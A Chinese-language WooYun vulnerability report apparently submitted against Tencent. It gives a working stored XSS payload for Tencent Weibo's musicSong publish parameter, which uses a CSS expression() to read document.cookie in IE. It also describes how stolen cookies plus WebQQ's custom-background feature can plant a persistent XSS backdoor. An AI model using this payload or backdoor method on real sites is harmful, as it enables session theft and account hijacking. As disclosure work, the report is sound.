WooYun.org

1. 首先是腾讯微博的这个问题，
历史轨迹
WooYun: 腾讯微博持久XSS漏洞
|
WooYun: 腾讯微博存储型XSS漏洞--看我这标题多普通
|
WooYun: 腾讯微博存储型XSS漏洞--看我这标题多普通2
------------------------------
再次测试时，这个点，还是存在问题，虽然没有先前的严重，但是在IE下还是可行的。
漏洞成因，没过滤"， 导致可以用style="x:expression ... 的方式触发XSS。
如下图，插入后的代码。

musicSong参数

http://api.t.qq.com/old/publish.php
content	#送礼物#@gainover xxxxx！ #A-a-aa-aaa-Irwin Goodman# xxxx
startTime	0
endTime	1350546646508
countType
viewModel
attips
sourcepic	http://qzonestyle.gtimg.cn/qzone/space_item/pre/13/82717_1.png
musicID	49976
musicSong	Irwin Goodman'"style="w:expression(if(!window.x){alert(document.cookie);window.x=1})"aaa=
musicSinger	mmmmm
musicLocation	http://stream10.qqmusic.qq.com/12049976.wma
musicShortUrl	1DmeVO
apiType	8
giftId	82717
eventId	5

播放音乐时，会弹个窗。。。

-----------------------------------
2. 至于WEBQQ这个。 敢把用自定义网页做背景的功能去掉么？在腾讯现有的架构下，只要拿到了cookies，这个拿网页做背景的功能，就是一个后门功能。
跨站脚本-可以让战场离得更远（浅谈腾讯架构缺陷）（ WooYun: 跨站脚本-可以让战场离得更远（浅谈腾讯架构缺陷） ） 中已经说明了相关问题。
这里我也不用脚本来做自动化的后门设置了。如有需要，相关利用代码和（ WooYun: 腾讯WEBQQ的持久劫持 - 反射型XSS到XSS后门的实现 ） 基本一样。
手工一样可以完成后门设置，流程： 通过一个反射型的XSS，拿到cookies之后。可以进入web.qq.com页面，将WEB背景的自定义地址设置为一个腾讯的反射型XSS。

这样受害者下次使用WEBQQ时，就会触发这个后门。